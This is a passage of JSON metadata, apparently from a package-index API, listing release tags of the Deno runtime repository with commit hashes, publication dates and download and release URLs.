9:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/